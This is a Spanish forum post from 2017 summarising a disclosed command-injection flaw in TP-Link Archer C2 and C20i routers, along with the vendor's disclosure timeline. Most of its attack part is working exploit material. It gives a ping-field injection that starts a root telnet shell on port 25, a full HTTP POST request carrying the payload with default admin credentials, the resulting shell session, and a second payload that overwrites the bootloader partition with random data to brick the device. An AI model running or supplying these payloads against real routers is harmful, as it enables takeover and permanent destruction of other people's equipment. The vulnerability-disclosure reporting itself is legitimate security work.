El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 10-02-2017 22:50:17

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,407

Se desvelan vulnerabilidades muy sevras en los "Archer ac" C2 y C20i

Dos modelos de la serie "Archer" (WiFi doble banda con soporte "ac") tienen brechas muy serias mediante apertura de sesión telnet con derechos de administrador,

archerac_1.png

  Pierre.kim ha relevado varias brechas muy interesantes en 2016 (contra routers de D-Link, Huawei, Totolink...) y vuelve a la carga en 2017.
Esta vez es al fabricante TP-Link que se ha interesado.
Ha encontrado una vulnerabilidad critica en los routers Archer; los productos estrellas de la firma china que son compatibles con estándar "ac"
Podéis leer todos los detalles en:

 

  El Archer c2 es un PA ac relativamente barato (por llevar wifi "ac") y que parece decente.
Su wifi "ac" no es alucinante (dos antenas) pero son antenas externas.
   Mejor un "ac" de dos antenas externas que un "ac" más rápido de tres antenas internas.
Porque si hay que ser a tres metros del router para gozar de la velcoidad ac... ¡Mejor conectarse por cable!
  El Archer C20i es un PA ac un poco más barato pero...  es muy poco atractivo.   
Su wifi ac es flojito sin antenas externas y además no tiene puertos gigabit...  Ni interesa para conectarse por cable. tongue
 
  La brecha desvelada es en esencia que un intruso puede ejecutar ordenes telenet(d)con privilegios de administrador.   
telent es una potente herramienta para la gestión remota del router,
Poder usar este protocolo es un sueño para un hacker juguetón
  Para inyectar comandos telnet  se solicita la "pagina para diagnósticos" de la interfaz web
Se insertan los ordenes que queremos ejecutar en el campo reservado al ping
algo así:

$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25)

Con esto abriremos una consola telnetd con sh en el puerto 25
Se manda en una petición http:

POST /cgi?2 HTTP/1.1
Host: 192.168.1.1
Content-Type: text/plain
Referer: http://192.168.1.1/mainFrame.htm
Content-Length: 208
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Connection: close


[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=1
host=$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25)
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested

Podéis ver los credenciales en base 64 en la linea " Cookie: Authorization ":  YWRtaW46YWRtaW4=
No los teníamos y ahora los tenemos big_smile : archerac_2.jpg
Ni hace falta indicarlos, la sesión esta abierta y se puede empezar a trabajar:

[email protected]:~/tplink-0day-c2-and-c20i$ telnet 192.168.1.1 25
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
~ # ls
web      usr      sbin     mnt      lib      dev
var      sys      proc     linuxrc  etc      bin

  A partir de ahí se pueden inventar exploits de todo tipo... 
El que sigue es realmente muy peligroso y fastidioso.
¡Vamos!... Es destrucción pura, vandalismo en el sentido original de la palabra.
Se basa por supuesto en esta capacidad a inyectar ordenes telnet..
  Si alguien te pega esta broma de mal gusto vas a pasar un muy mal rato... tongue
  Consiste en sobrescribir el inicio de la partición U-bot con caracteres aleatorios...
    El router se volverá loco y no podrá arrancar de nuevo.
  Tendrás que hackear el dispositivo si no quieres tener un ladrillo...
  Se podría hacer inyectando esta linea de ordenes   

$(echo 127.0.0.1; cat /dev/random > /dev/mtd0)

Reemplazamos el contenido de mtd0 con números aleatorios (dev/random) .
 
  Si leéis el documento veréis también cómo hacer una DoS imparable y cómo manipular las reglas del corta-fuego.
  Telnet es un protocolo que permite hacer de todo y se pueden elaborar miles de ataques devastadores con una consola telnet con privilegios root.

  Me quejo siempre de los fabricantes que muchas veces pasan de todo y dejan las brechas sin arreglos. .
Esta vez los de TP-Link parecen no haberlo hecho tan mal. 

* Sep 17, 2016: Vulnerabilities found by Pierre Kim.
* Dec 26, 2016: TP-Link support is contacted by livechat. TP-Link
replies there is no process to handle security problems in TP-Link
routers and refuses to indicate a security point of contact.
* Dec 27, 2016: TP-Link support is notified of the vulnerabilities
(using support () tp-link.com, security () tp-link.com, lishaozhang ()
tp-link.net [from /lib/modules/ipt_STAT.ko], huangwenzhong ()
tp-link.net [from /lib/modules/tp_domain.ko]).
* Dec 29, 2016: Pierre sends a full advisory to TP-Link security team.
* Dec 30, 2016: TP-Link confirms the reception of the advisory.
* Jan 03, 2017: Pierre asks TP-Link to confirm the vulnerabilities.
* Jan 09, 2017: TP-Link confirms the security vulnerabilities in
TP-Link C2 and C20i routers and security patches are in progress.
* Jan 21, 2017: Ping from TP-Link about the "Vendor Response" section.
* Jan 23, 2017: Pierre answers, asking details in the "Vendor Response" section.
* Jan 24, 2017: TP-Link Korea contacts Pierre Kim about the vulnerabilities.
* Jan 27, 2017: Pierre sends a final draft to TP-Link.
* Feb 09, 2017: A public advisory is sent to security mailing lists.

La primera respuesta es para flipar: No han querido dar le un contacto para hablar de la brecha. big_smile
Al final han tratado el asunto y los parches deberían salir este mes...
Más o menos un mes y medio para tomar conocimiento del asunto y resolverlo.
  No es para darles un grammy award pero no está tan mal. big_smile

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Pie de página

Información del usuario

Ultimo usuario registrado: Mukesur
Usuarios registrados conectados: 0
Invitados conectados: 17

Estadisticas de los foros

Número total de usuarios registrados: 1,189
Número total de temas: 1,178
Número total de mensajes: 12,201

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21